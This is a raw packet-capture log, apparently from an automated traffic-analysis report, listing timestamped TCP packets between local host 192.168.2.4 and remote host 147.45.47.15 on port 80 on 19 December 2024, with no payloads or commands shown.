                                                                                                              Dec 19, 2024 08:11:51.511104107 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.511115074 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.511157036 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.512059927 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.512331009 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.512377977 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.513118982 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.513187885 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.513359070 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.514117956 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.514257908 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.514300108 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.515201092 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.515319109 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.515386105 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.516202927 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.516307116 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.516360998 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.517256975 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.517400026 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.517438889 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.518388033 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.518402100 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.518439054 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.519304991 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.519503117 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.519575119 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.520349026 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.520637989 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.520674944 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.521404028 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.522505045 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.522516012 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.522556067 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.522989988 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.523029089 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.523581028 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.523592949 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.523638010 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.524960041 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.524971962 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.525010109 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.525557995 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.525672913 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.525722027 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.526957989 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.526968956 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.527004957 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.528312922 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.528337955 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.528430939 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.528913975 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.528924942 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.528958082 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.530167103 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.530179024 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.530213118 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.530841112 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.530936003 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.531033993 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.532051086 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.532063007 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.532114029 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.532946110 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.533037901 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.533085108 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.533900023 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.533986092 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.534023046 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.534993887 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.535300970 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.535389900 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.536267042 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.536278963 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.536334991 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.537182093 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.537194014 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.537229061 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.538291931 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.538302898 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.538350105 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.539267063 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.539279938 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.539328098 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.540112019 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.540319920 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.540360928 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.541181087 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.541270018 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.541328907 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.542222023 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.542371035 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.542414904 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.543344975 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.543356895 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.543405056 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.544307947 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.544684887 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.544727087 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.545316935 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.545450926 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.545500994 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.546559095 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.546571016 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.546621084 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.547471046 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.547519922 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.547705889 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.548434019 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.548702002 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.548748970 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.549524069 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.549604893 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.549648046 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.551275969 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.598136902 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.694909096 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.695025921 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.695200920 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.695349932 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.695539951 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.695589066 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.696824074 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.696835995 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.696877956 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.697654963 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.697736979 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.697814941 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.698492050 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.698803902 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.698905945 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.699534893 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.699709892 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.699774981 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.700584888 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.700628996 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.700783968 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.701627970 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.701760054 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.701802969 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.702764034 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.702775002 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.702826023 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.703669071 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.703875065 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.703922033 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.704833031 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.704844952 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.704902887 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.705902100 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.705941916 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.706013918 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.706963062 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.706974983 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.707016945 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.707869053 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.707998991 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.708054066 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.708873987 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.709011078 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.709057093 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.709947109 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.710140944 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.710269928 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.710974932 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.711112022 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.711173058 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.712142944 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.712155104 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.712203026 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.713038921 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.713187933 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.713254929 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.714164019 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.714230061 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.714292049 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.715183020 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.715230942 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.715321064 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.716300011 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.716474056 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.716716051 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.717425108 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.717648029 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.717706919 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.718430042 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.718954086 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.719037056 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.719310999 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.719454050 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.719500065 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.720411062 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.720482111 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.720556021 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.721407890 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.721431017 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.721471071 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.722522020 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.722829103 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.722866058 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.723598003 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.723726034 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.723771095 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.724678993 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.724733114 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.725002050 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.725559950 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.725692987 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.725766897 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.726679087 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.726887941 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.726988077 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.727654934 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.727722883 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.727792978 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.729268074 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.729284048 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.729337931 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.729729891 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.730078936 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.730127096 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.731087923 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.731100082 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.731157064 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.731991053 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.732003927 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.732042074 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.733283997 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.733297110 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.733350992 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.733999968 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.734011889 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.734052896 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.734908104 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.735063076 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.735129118 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.735992908 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.736219883 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.736278057 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.737024069 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.737193108 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.737250090 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.738097906 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.738111019 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.738172054 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.739033937 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.739167929 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.739216089 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.740137100 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.740257025 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.740385056 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.741266012 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.741278887 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.741321087 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.742278099 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.742290974 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.742327929 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.743242025 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.743262053 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.743328094 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.744246006 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.744590044 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.744641066 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.745332956 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.745403051 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.745462894 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.746984005 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.746998072 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.747035027 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.747378111 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.747838974 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.747925043 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.748413086 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.748524904 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.748565912 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.749181986 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.749700069 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.801315069 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.886984110 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.887124062 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.887177944 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.887257099 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.887310028 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.887348890 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.888326883 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.888488054 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.888537884 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.889477015 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.889492035 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.889532089 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.890439987 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.890616894 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.890661001 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.891511917 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.891614914 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.891680956 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.892492056 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.892600060 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.892649889 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.893621922 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.893763065 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.893807888 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.894661903 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.894804955 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.894850969 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.895818949 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.895834923 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.895878077 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.896651983 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.896666050 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.896708965 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.897995949 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.898104906 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.898156881 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.899077892 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.899092913 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.899135113 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.899763107 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.899940968 CET8049738147.45.47.15192.168.2.4
